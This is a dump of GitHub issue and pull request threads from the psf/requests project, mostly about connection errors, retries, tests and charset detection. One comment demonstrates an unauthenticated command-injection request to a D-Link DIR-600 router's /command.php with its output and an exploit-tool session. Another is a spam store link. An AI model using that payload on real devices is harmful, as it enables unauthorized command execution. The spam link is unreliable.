I am encountering this error when making a PUT request on Windows only, It works fine on *nix. ``` requests.put( https://upload.com, timeout=None, headers={ 'Content-Length': 28689538, 'Content-Range': 'bytes: 0-28689538/28689538', 'User-Agent': 'test' }, data=f) File "C:\Python27\lib\site-packages\requests\api.py", line 105, in put return request('put', url, data=data, **kwargs) File "C:\Python27\lib\site-packages\requests\api.py", line 49, in request return session.request(method=method, url=url, **kwargs) File "C:\Python27\lib\site-packages\requests\sessions.py", line 457, in request resp = self.send(prep, **send_kwargs) File "C:\Python27\lib\site-packages\requests\sessions.py", line 569, in send r = adapter.send(request, **kwargs) File "C:\Python27\lib\site-packages\requests\adapters.py", line 408, in send raise ConnectionError(err, request=request) ConnectionError: ('Connection aborted.', BadStatusLine("''",)) ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2364/reactions" }
https://api.github.com/repos/psf/requests/issues/2364/timeline
null
completed
null
null
false
[ "`BadStatusLine` is an exception coming out of the bowels of `httplib`, and it suggests that the data it receives doesn't make any sense. If I had to guess, I'd say that the obvious error is related to the TLS connection you're making. It would be interesting to see a packet capture (from tcpdump or wireshark) of this.\n", "I usually see this when a proxy terminates a HTTPS connection. It can't\nsend back headers, because it can't read the encrypted data going back and\nforth, so it sends back the empty string \"\". httplib attempts to parse \"\"\nas \"HTTP/1.x <status>\" and fails with the above message.\n\nHow long did it take to fail?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Mon, Dec 1, 2014 at 3:06 PM, Cory Benfield [email protected]\nwrote:\n\n> BadStatusLine is an exception coming out of the bowels of httplib, and it\n> suggests that the data it receives doesn't make any sense. If I had to\n> guess, I'd say that the obvious error is related to the TLS connection\n> you're making. It would be interesting to see a packet capture (from\n> tcpdump or wireshark) of this.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-65152706\n> .\n", "@kevinburke it usually takes about a minute to fail.\n\nI've attached a few screenshots from wireshark. Let me know if a screenshot of something else might be more helpful.\n\n![initial](https://cloud.githubusercontent.com/assets/410872/5265689/49539ce0-7a12-11e4-9fea-fde29204fe43.png)\n\n![exchange](https://cloud.githubusercontent.com/assets/410872/5265696/5426e35c-7a12-11e4-85ee-e26cfc64c9db.png)\n\nThanks guys\n", "Are there any machine or proxies sittin in between the server and the\nclient? does the client machine have a default socket timeout configured?\n\nOn Tuesday, December 2, 2014, Joe Cabrera [email protected] wrote:\n\n> @kevinburke https://github.com/kevinburke it usually takes about a\n> minute to fail.\n> \n> I've attached a few screenshots from wireshark. Let me know if a\n> screenshot of something else might be more helpful.\n> \n> [image: initial]\n> https://cloud.githubusercontent.com/assets/410872/5265689/49539ce0-7a12-11e4-9fea-fde29204fe43.png\n> \n> [image: exchange]\n> https://cloud.githubusercontent.com/assets/410872/5265696/5426e35c-7a12-11e4-85ee-e26cfc64c9db.png\n> \n> Thanks guys\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-65253593\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "@kevinburke there is a NAT sitting between the machine and the server, but no proxy.\n\nI am using a `(1,30)` timeout and my understanding is `requests` overrides whatever the client timeout defaults are.\n", "That's correct. Curious why it's taking a minute to time out if you set the\ntimeout to 30 seconds.\n\nOn Tuesday, December 2, 2014, Joe Cabrera [email protected] wrote:\n\n> @kevinburke https://github.com/kevinburke there is a NAT sitting\n> between the machine and the server, but no proxy.\n> \n> I am using a (1,30) timeout and my understanding is requests overrides\n> whatever the client timeout defaults are.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-65262796\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "@kevinburke it could be closer to 30 seconds, however I also make more than 1 request\n", "This error can also occur on Linux too, more descriptive errors messages would be useful for people trying to debug their code.\n", "Yeah :( unfortunately this specific error is thrown by httplib which is in\nthe standard library. We could rewrap it with a better message maybe\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Dec 11, 2014 at 9:10 PM, Joe Cabrera [email protected]\nwrote:\n\n> This error can also occur on Linux too, more descriptive errors messages\n> would be useful for people trying to debug their code.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-66733026\n> .\n", "It's already re-wrapped. We do not (and will not) do exception message introspection. It would be great if we had better messages in the stdlib but trying to get features into httplib is harder than pulling teeth.\n", "Thanks for the help all. I would like to pick up this error with the httplib team, but I'll go ahead and close the issue here for now.\n", "did you guys figure this one out? cc @dongnizh \n", "This error message can now be replaced with `RemoteDisconnected` see issue [23054](https://bugs.python.org/issue23054)\n", "@greedo Python 3.5 has not been released yet and this is not something we can just _replace_. http.client on Python 3.5 will raise RemoteDisconnected now instead of BadStatusLine (presumably in only _some_ cases) and that will be wrapped the same way that we currently wrap BadStatusLine.\n", "In my case it was the proxy (environment vars) issue which was causing the issue. `httpretty` was trying to use proxy and it was failing. Disabling my `proxy` by unsetting the environment variables fixed the issue.\n", "I've just hit this issue too in Python requests 2.8.1.\n\nIn my case I'm making a large number of periodic https requests to a apache2 server with connection keep-alive timeout 5s. There is a race between the server closing a timed out persistent connection and the client making a request on the same connection. Given a bit of network latency the client can often attempt to send a request on the socket before it gets notified it as been closed.\n\nGiven my application (testing an API) I'm going to handle the specific exception that results with a retry or two.\n", "```\n~ python -V\nPython 2.7.10\n```\n\n```\n~ python\nPython 2.7.10 (default, Oct 23 2015, 19:19:21)\n[GCC 4.2.1 Compatible Apple LLVM 7.0.0 (clang-700.0.59.5)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests;\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d')\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py\", line 518, in post\n return self.request('POST', url, data=data, json=json, **kwargs)\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py\", line 475, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py\", line 585, in send\n r = adapter.send(request, **kwargs)\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/adapters.py\", line 453, in send\n raise ConnectionError(err, request=request)\nrequests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine(\"''\",))\n```\n\nIf **`headers={'Content-Type': 'application/x-www-form-urlencoded'}`** is set, everything goes well.\n\n```\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d', headers={'Content-Type': 'application/x-www-form-urlencoded'})\n>>> resp.text\nu'\\r\\n\\r\\n20000101\\n'\n```\n\n---\n\nIf you want details, please redirects to https://github.com/open-security/vulnpwn/pull/10\n\n```\nvulnpwn [master] ./vulnpwn\nvulnpwn > show modules\n[*]\n[*] exploits/linux/http/dlink_command_php_unauth_rce\n[*] exploits/multi/http/apache_struts_dmi_rce\n[*]\nvulnpwn > use exploits/linux/http/dlink_command_php_unauth_rce\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > show options\n[*]\n[*] Option Current Setting Description\n[*] --------- --------------- ---------------------\n[*] TARGETURI /command.php target uri to request\n[*] RHOST 192.168.1.1 the target host\n[*] RPORT 80 the target port\n[*]\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > set RHOST 192.168.128.159\n[*] SET => RHOST = (192.168.128.159)\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > run\n[*] Exploiting - http://192.168.128.159:80/command.php\n[*] Target is vulnable\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > exit\nvulnpwn > exit\n```\n", "@join-us Requests does not normally assume that plain text strings are form-encoded data. If you want them to be signaled as form-encoded, you need to pass a dictionary to data: `data={'cmd': 'date +%Y%m%d'}`. Alternatively, as you have done, you can set the header manually.\n", "Note that the _error_ you're encountering is the fault of the remote server, which is closing the connection without sending an error response. It shouldn't do that.\n", "Thanks @Lukasa. **`data={'cmd': 'date +%Y%m%d'}`** fails to receive command results, ex:\n\n```\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d', headers={'Content-Type': 'application/x-www-form-urlencoded'})\n>>> resp.text\nu'\\r\\n\\r\\n20000101\\n'\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data={'cmd': 'date +%Y%m%d'}, headers={'Content-Type': 'application/x-www-form-urlencoded'})\n>>> resp.text\nu'\\r\\n\\r\\n'\n```\n", "Hrgh.\n\nWhatever web server you're talking to is not very good. You see, requests will percent-encode data when sent using the dictionary form, so that the underlying string ends up looking like this: `'cmd=date+%2B%25Y%25m%25d'`. That's the correct form for data that is form-urlencoded: it's the _urlencode_ part of the thing! However, your server seems to want data that _advertises_ itself as form-urlencoded but _is not_ form-urlencoded. Your best bet, then, is going to be to continue to manually set the header yourself: the web server is just being stupid.\n", "@Lukasa I've tested this against **`D-LINK DIR-600`** routers\n\n## requests\n\n```\nPOST /command.php HTTP/1.1\nHost: 192.168.128.159\nConnection: keep-alive\nAccept-Encoding: gzip, deflate\nAccept: */*\nUser-Agent: python-requests/2.10.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 24\n\ncmd=date+%2B%25Y%25m%25dHTTP/1.1 200 OK\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.11\nDate: Sat, 01 Jan 2000 14:44:49 GMT\nTransfer-Encoding: chunked\nContent-Type: text/html\n\n4\n\n\n\n0\n\n\n```\n\n## curl -- OK\n\n```\nPOST /command.php HTTP/1.1\nHost: 192.168.128.159\nUser-Agent: curl/7.43.0\nAccept: */*\nContent-Length: 16\nContent-Type: application/x-www-form-urlencoded\n\ncmd=date +%Y%m%dHTTP/1.1 200 OK\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.11\nDate: Thu, 23 Mar 2000 15:18:23 GMT\nTransfer-Encoding: chunked\nContent-Type: text/html\n\nd\n\n\n20000323\n\n0\n```\n", "@join-us That provides no new information: curl isn't form encoding your data either. My advice in the previous post stands.\n", "OK, thanks.\n", "I had the same error.\nI'm using a SSH tunnel and for some reason with a delay of two seconds after tunnel establishment I could make the request correctly\n", "Hi! \n\nJust take a look at this stuff! There are so many beautiful things here, you should visit the store http://order.aliemresevik.com/e4ieej\n\nBests, ziney2y\n", "Currently able to reproduce this reliably on Fedora 24 (python2-requests-2.10.0-2.fc24), against multiple Apache httpd web servers. I can even reproduce against localhost with a carefully chosen delay.\n\nCode here: https://github.com/mikem23/keepalive-race\n", "@sigmavirus24 The reason `RemoteDisconnected` exception was added, is so that HTTP clients can safely retry (see [issue 3566](https://bugs.python.org/issue3566)).\r\nDon't you think the right behavior here is adding an automatic retry?", "@shoham-stratoscale presuming that the \"right behaviour\" is an automatic retry, that should be added to urllib3 (which actually handles the error), not requests.", "now my turn to try to handle this issue, and I'm trying to do a retry, like the following in my request session object:\r\n```\r\n requests_retry = Retry(total=10,\r\n read=2,\r\n method_whitelist=frozenset(['HEAD', 'GET', 'PUT', 'DELETE', 'OPTIONS', 'TRACE', 'POST'])\r\n )\r\n adapter = HTTPAdapter(max_retries=requests_retry)\r\n self.mount('http://', adapter)\r\n self.mount('https://', adapter)\r\n```\r\n\r\nthis actully works, but it open my code to retry on any read error what so ever. I want to make it specifc to this BadStatusLine\r\n\r\nsection 8.1.4 in https://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html says this:\r\n\r\n> A client, server, or proxy MAY close the transport connection at any time. For example, a client might have started to send a new request at the same time that the server has decided to close the \"idle\" connection. From the server's point of view, the connection is being closed while it was idle, but from the client's point of view, a request is in progress.\r\n> \r\n> This means that clients, servers, and proxies MUST be able to recover from asynchronous close events. Client software SHOULD reopen the transport connection and retransmit the aborted sequence of requests without user interaction so long as the request sequence is idempotent (see section 9.1.2). Non-idempotent methods or sequences MUST NOT be automatically retried, although user agents MAY offer a human operator the choice of retrying the request(s). Confirmation by user-agent software with semantic understanding of the application MAY substitute for user confirmation. The automatic retry SHOULD NOT be repeated if the second sequence of requests fails.\r\n\r\nI want todo this automatic thing listed in the last line, but I think read errors group is a bit too wide to retry on. and in my case I have lots of failures cause by proxies disconnect on keep-alive timeouts in POST calls (i.e. maybe non-idempotent calls)\r\n\r\nnode.js has this package as a \"soultion\":\r\nhttps://www.npmjs.com/package/agentkeepalive\r\n\r\nso you can match the client timeouts to the proxies keep alive timeout, i.e. make the client hang-up before them.\r\nbut could found a way to achive this in requests/urllib3. \r\n\r\nI've looked into the Retry class thinking of subclassing it for this propose, but maybe i'm missing a better way here ?\r\n\r\n@Lukasa what do you think ? is that a good approch ? or i'm wasting my time on such a \"nitpick\" ? \r\n\r\nalso wondering is keep-alive not being used that heavily as I assumed, that people aren't facing this issues, or they aren't keeping long sessions at all ? or again, maybe i'm missing something here ?" ]
https://api.github.com/repos/psf/requests/issues/2363
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2363/labels{/name}
https://api.github.com/repos/psf/requests/issues/2363/comments
https://api.github.com/repos/psf/requests/issues/2363/events
https://github.com/psf/requests/pull/2363
50,586,064
MDExOlB1bGxSZXF1ZXN0MjUzMDQwMjM=
2,363
Update tests to work offline
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-01T22:25:44Z
2021-09-08T09:01:11Z
2014-12-03T04:46:10Z
CONTRIBUTOR
resolved
There are still some that we cannot force to work offline but this improves a lot of things.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2363/reactions" }
https://api.github.com/repos/psf/requests/issues/2363/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2363.diff", "html_url": "https://github.com/psf/requests/pull/2363", "merged_at": "2014-12-03T04:46:10Z", "patch_url": "https://github.com/psf/requests/pull/2363.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2363" }
true
[ "Some of the tests you port to `httpbin()` use `http` and others use `https`, is that significant?\n", "@alex those tests that were using https didn't seem to have any necessity to rely on https. They were likely written by me and I just write `'https://httpbin.org'` everytime I want to talk to httpbin by force of habit.\n" ]
https://api.github.com/repos/psf/requests/issues/2362
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2362/labels{/name}
https://api.github.com/repos/psf/requests/issues/2362/comments
https://api.github.com/repos/psf/requests/issues/2362/events
https://github.com/psf/requests/issues/2362
50,566,424
MDU6SXNzdWU1MDU2NjQyNA==
2,362
Reduce bus factor
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2014-12-01T19:51:59Z
2021-09-08T23:06:51Z
2014-12-08T17:03:13Z
CONTRIBUTOR
resolved
Keys to the kingdom for @Lukasa and @sigmavirus24. This includes.... - [ ] DNSimple collab access] - [x] PyPi collab access I think that's it...
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2362/reactions" }
https://api.github.com/repos/psf/requests/issues/2362/timeline
null
completed
null
null
false
[ "What about ci.kennethreitz.org\n", "@kevinburke hmm, i suppose so . \n", "Op on the IRC channel as well\n", "@kevinburke if someone tells me what command to type in, i'll do it lol\n", "I'm not sure we need op on the channel. I've never seen any problems arise in there. \n\n```\n/msg ChanServ FLAGS #python-requests lukasa +voAti\n/msg ChanServ FLAGS #python-requests sigmavirus24 +voAti\n```\n\nShould allow @Lukasa and I to OP ourselves with ChanServ when necessary. Ideally not having OP on by default will be a positive impact on the channel's atmosphere \n", "@sigmavirus24 now has access to dnsimple. @Lukasa, can you tell me your dnsimple email address? \n", "Just sent you an invite anyway — hopefully it works :)\n", "\"lukasa is not registered.\"\n\nsigma is good. \n", "@kennethreitz Sorry, used a different one: [email protected].\n\nAlways best to have 8 million email addresses.\n", "cool, i'll say this is done now. \n", "CI is still something to think about...\n", "Yeah. I'm curious why that's no longer building PRs or anything. If you want, I can set up ci.sigmavir.us to do CI here for now, but I'll need access to settings (or will need to sync up with @Lukasa about adding it)\n" ]
https://api.github.com/repos/psf/requests/issues/2361
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2361/labels{/name}
https://api.github.com/repos/psf/requests/issues/2361/comments
https://api.github.com/repos/psf/requests/issues/2361/events
https://github.com/psf/requests/issues/2361
50,513,357
MDU6SXNzdWU1MDUxMzM1Nw==
2,361
Combining pool_block == True with head blocks
{ "avatar_url": "https://avatars.githubusercontent.com/u/5834577?v=4", "events_url": "https://api.github.com/users/ARF1/events{/privacy}", "followers_url": "https://api.github.com/users/ARF1/followers", "following_url": "https://api.github.com/users/ARF1/following{/other_user}", "gists_url": "https://api.github.com/users/ARF1/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ARF1", "id": 5834577, "login": "ARF1", "node_id": "MDQ6VXNlcjU4MzQ1Nzc=", "organizations_url": "https://api.github.com/users/ARF1/orgs", "received_events_url": "https://api.github.com/users/ARF1/received_events", "repos_url": "https://api.github.com/users/ARF1/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ARF1/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ARF1/subscriptions", "type": "User", "url": "https://api.github.com/users/ARF1", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-01T11:23:57Z
2021-09-08T23:05:46Z
2015-04-07T14:10:08Z
NONE
resolved
I am using requests to read redirection targets from 302 responses for a list of urls. The core function is: ``` def getRedirect(url): print('requesting: %s' % url) request = reqsSess.head(url) print('done: %s' % url) request.raise_for_status() location = request.headers['location'] request.close() return location ``` To avoid I/O lock, I am using gevent to spawn a separate `getRedirect` for all urls in my list (about 1000) and wanted to use requests' adapter rate limiting. Here I limited to one connection for testing purposes, but obviously the idea was to raise this once confirmed the it works. (Note, raising to 2 makes no difference to the issue.) ``` import requests connection_limit = 1 adapter = requests.adapters.HTTPAdapter(pool_connections=connection_limit, max_retries=3, pool_block=True) reqsSess = requests.session() reqsSess.mount('http://www.mydomain.com', adapter) ``` The problem is, that I only see "requesting: url1", etc only eight times. Then the script blocks. Am I doing something wrong? I thought this might be related to #1967 but adding `request.close()` did not help.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2361/reactions" }
https://api.github.com/repos/psf/requests/issues/2361/timeline
null
completed
null
null
false
[ "Additional observations:\n\nWith `connection_limit = 1` and `pool_block=True`, about 6-8 (changing) `requesting: url...` statements are printed. Wireshark shows only a single DNS request and response. **No http requests of any kind are transmitted.**\n\nWith `connection_limit = 2` and `pool_block=True`, exactly 11 `requesting: url...` statements are printed. Wireshark shows only 10 DNS requests and responses. **No http requests of any kind are transmitted.**\n\nWith `connection_limit = 1` and `pool_block=False`, `requesting: url...` statements are printed interspersed with the warning that the connection pool is full. **Wireshark shows http HEAD requests are transmitted and responses received.**\n" ]
https://api.github.com/repos/psf/requests/issues/2360
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2360/labels{/name}
https://api.github.com/repos/psf/requests/issues/2360/comments
https://api.github.com/repos/psf/requests/issues/2360/events
https://github.com/psf/requests/pull/2360
50,474,384
MDExOlB1bGxSZXF1ZXN0MjUyNDEyMDM=
2,360
dummy commit
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-30T23:02:02Z
2021-09-08T09:01:11Z
2014-11-30T23:36:43Z
CONTRIBUTOR
resolved
testing whether ci.kennethreitz.org is working again
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2360/reactions" }
https://api.github.com/repos/psf/requests/issues/2360/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2360.diff", "html_url": "https://github.com/psf/requests/pull/2360", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2360.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2360" }
true
[ "looks like it is!\n" ]
https://api.github.com/repos/psf/requests/issues/2359
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2359/labels{/name}
https://api.github.com/repos/psf/requests/issues/2359/comments
https://api.github.com/repos/psf/requests/issues/2359/events
https://github.com/psf/requests/issues/2359
50,243,267
MDU6SXNzdWU1MDI0MzI2Nw==
2,359
Charset detection in text() can be pathologically slow
{ "avatar_url": "https://avatars.githubusercontent.com/u/1546674?v=4", "events_url": "https://api.github.com/users/marcocova/events{/privacy}", "followers_url": "https://api.github.com/users/marcocova/followers", "following_url": "https://api.github.com/users/marcocova/following{/other_user}", "gists_url": "https://api.github.com/users/marcocova/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/marcocova", "id": 1546674, "login": "marcocova", "node_id": "MDQ6VXNlcjE1NDY2NzQ=", "organizations_url": "https://api.github.com/users/marcocova/orgs", "received_events_url": "https://api.github.com/users/marcocova/received_events", "repos_url": "https://api.github.com/users/marcocova/repos", "site_admin": false, "starred_url": "https://api.github.com/users/marcocova/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/marcocova/subscriptions", "type": "User", "url": "https://api.github.com/users/marcocova", "user_view_type": "public" }
[ { "color": "f7c6c7", "default": false, "description": null, "id": 167537670, "name": "Propose Close", "node_id": "MDU6TGFiZWwxNjc1Mzc2NzA=", "url": "https://api.github.com/repos/psf/requests/labels/Propose%20Close" } ]
closed
true
null
[]
null
10
2014-11-27T01:00:37Z
2021-09-03T00:10:52Z
2015-04-07T13:43:51Z
NONE
resolved
When calling `response.text()` and no encoding was set or determined, requests relies on `chardet` to detect the encoding: ``` python @property def apparent_encoding(self): """The apparent encoding, provided by the chardet library""" return chardet.detect(self.content)['encoding'] ``` Unfortunately, chardet can be pathologically [slow and memory-hungry](https://github.com/chardet/chardet/issues/29) to do its job. For example, processing the text property of a response with the following content: ``` "a" * (1024 * 1024) + "\xa9" ``` causes python-requests to use 131.00MB and 40+ seconds (for a 1MB response!)
